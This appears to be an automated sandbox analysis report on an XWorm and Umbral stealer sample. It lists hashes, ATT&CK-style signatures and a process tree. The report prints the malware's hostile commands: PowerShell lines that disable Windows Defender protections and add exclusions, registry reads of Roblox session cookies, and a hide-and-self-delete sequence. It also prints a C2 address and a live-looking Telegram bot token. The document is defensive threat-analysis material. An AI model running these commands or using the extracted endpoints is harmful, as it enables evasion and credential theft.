Overview

overview

10

Static

static

3

Output.exe

windows7-x64

10

Output.exe

windows7-x64

10

Output.exe

windows10-2004-x64

10

Output.exe

windows10-ltsc 2021-x64

10

Output.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250211-en
  • resource tags

    arch:x64arch:x86image:win11-20250211-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    11-02-2025 19:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Output.exe

  • Size

    322KB

  • MD5

    710c071c63a8d8d1cd493c81d34834dc

  • SHA1

    050c535a206ac05550e3670ef465efe83585a76b

  • SHA256

    38944e7579d5fcd2263e7212954619c496d4ff087360b8db6e190e1bdf5358ce

  • SHA512

    af1753c06c22178d1362ab964e445dbe49c5cf3c83ebceabf21b9a7c4cc30efbc66b3a28c4d4f90efba081faba84047edb190d2f05abe416ebf1a1b6c36aad13

  • SSDEEP

    6144:PhPKqm0guLkkFZFjbnSrOsrfUVCmveA3E6Chow8rtryB8YROu+oSxOFDxXMR17:5NnnfZTSHfUV7/E6twurFG+oS4FDxXMP

Score
10/10
umbralxwormdiscoveryexecutionratspywarestealertrojan

Malware Config

Extracted

Family

xworm

C2

147.185.221.19:18254

Attributes
  • Install_directory

    %Temp%

  • install_file

    SecurityHost.exe

  • telegram

    https://api.telegram.org/bot7873282441:AAFVeYQ8VZCC3gF8qlaTYIz4N-gMEL21mHI/sendMessage?chat_id=7952080340

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    defense_evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\Output.exe
    "C:\Users\Admin\AppData\Local\Temp\Output.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3780
    • C:\Users\Admin\AppData\Local\Temp\1.16.5.exe
      "C:\Users\Admin\AppData\Local\Temp\1.16.5.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4312
    • C:\Users\Admin\AppData\Local\Temp\SystemHost.exe
      "C:\Users\Admin\AppData\Local\Temp\SystemHost.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4624
      • C:\Windows\SYSTEM32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\SystemHost.exe"
        3⤵
        • Views/modifies file attributes
        PID:3468
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SystemHost.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1532
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1456
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1308
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1372
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4216
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4492
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
          PID:4972
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:1008
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          3⤵
          • Detects videocard installed
          PID:2392
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\SystemHost.exe" && pause
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:3316
          • C:\Windows\system32\PING.EXE
            ping localhost
            4⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:1988

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      38ecc5b95c11e5a77558753102979c51

      SHA1

      c0759b08ef377df9979d8835d8a7e464cd8eaf6b

      SHA256

      2eb69abe0af5a2fb5bb313533cef641e25016876b874353f7d737c7ad672c79e

      SHA512

      9bf4ce3bc097bdd0242bd105c936a9c9403d5ac83ec99e6a310591a7b8d26309485f3e0cdc4cba67c322f834c325a2b63a008adb078f3a3307094c4b68a48686

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      d0a4a3b9a52b8fe3b019f6cd0ef3dad6

      SHA1

      fed70ce7834c3b97edbd078eccda1e5effa527cd

      SHA256

      21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

      SHA512

      1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      948B

      MD5

      43b2acc13ba1fe53d4f8859fe4f98cfd

      SHA1

      d917f316b17b600053802c3133dae8c2466a7f41

      SHA256

      b6630b73e4df2c36854f9480fe321ceb44fe45103d74a509c6d616c120509186

      SHA512

      8851c9fb935dfa61345903ec7ec859779a98c0fd40bd5ad8f2a103f68b59ee3e7527664cb44fb0b3b17fd21977ed554e9b0aca0b1c8fec8d51b565a29d48d5e9

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      7332074ae2b01262736b6fbd9e100dac

      SHA1

      22f992165065107cc9417fa4117240d84414a13c

      SHA256

      baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa

      SHA512

      4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\1.16.5.exe
      Filesize

      80KB

      MD5

      0154c502a44c2d5f9b4d5ccbbb00dd10

      SHA1

      d7e0d7311c345dfd8d9b866d0cc9947da75ef194

      SHA256

      75d7a768d90e198c91aa274d24ff8f08ba95692b888d314aaf6278bb9a175027

      SHA512

      f237bbf5d80712ec3627a618dcd52bb75c379b8e5d3a9f4f10e09cabdb8dfb61a64ec6663b853b607f4add930dd19f249dfdce2b76240820bd3d5cd4ae555e09

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\SystemHost.exe
      Filesize

      231KB

      MD5

      4855e5d98bb0ba10ce6acafaee9a9604

      SHA1

      8ef1a61d89cba2fd51460af7a902150e7066881a

      SHA256

      c51f4e4068a1ad51be55c670091bcddf525e4c3e4a43da4d1c1ab9fe9ac8f1e0

      SHA512

      39240a196a462be0c1fbf45d5d3a755767fef8d89eb4b63bcff30062be746a1237e47cb6fd4d0e980b8786416d5310bff4a40d34d7bcbc447a0c0110a31d3254

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_55t12voa.rhu.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/1532-39-0x00000211E78F0000-0x00000211E7912000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3780-1-0x00000000005E0000-0x0000000000636000-memory.dmp

      Filesize

      344KB

      Download

    • memory/3780-0-0x00007FFA229B3000-0x00007FFA229B5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4312-26-0x0000000000230000-0x000000000024A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/4312-29-0x00007FFA229B0000-0x00007FFA23472000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4312-28-0x00007FFA229B0000-0x00007FFA23472000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4624-30-0x00007FFA229B0000-0x00007FFA23472000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4624-53-0x0000017F37860000-0x0000017F378D6000-memory.dmp

      Filesize

      472KB

      Download

    • memory/4624-54-0x0000017F378E0000-0x0000017F37930000-memory.dmp

      Filesize

      320KB

      Download

    • memory/4624-55-0x0000017F1EF30000-0x0000017F1EF4E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/4624-27-0x00007FFA229B0000-0x00007FFA23472000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4624-90-0x0000017F1EF60000-0x0000017F1EF6A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4624-91-0x0000017F37840000-0x0000017F37852000-memory.dmp

      Filesize

      72KB

      Download

    • memory/4624-25-0x0000017F1D050000-0x0000017F1D090000-memory.dmp

      Filesize

      256KB

      Download

    • memory/4624-110-0x00007FFA229B0000-0x00007FFA23472000-memory.dmp

      Filesize

      10.8MB

      Download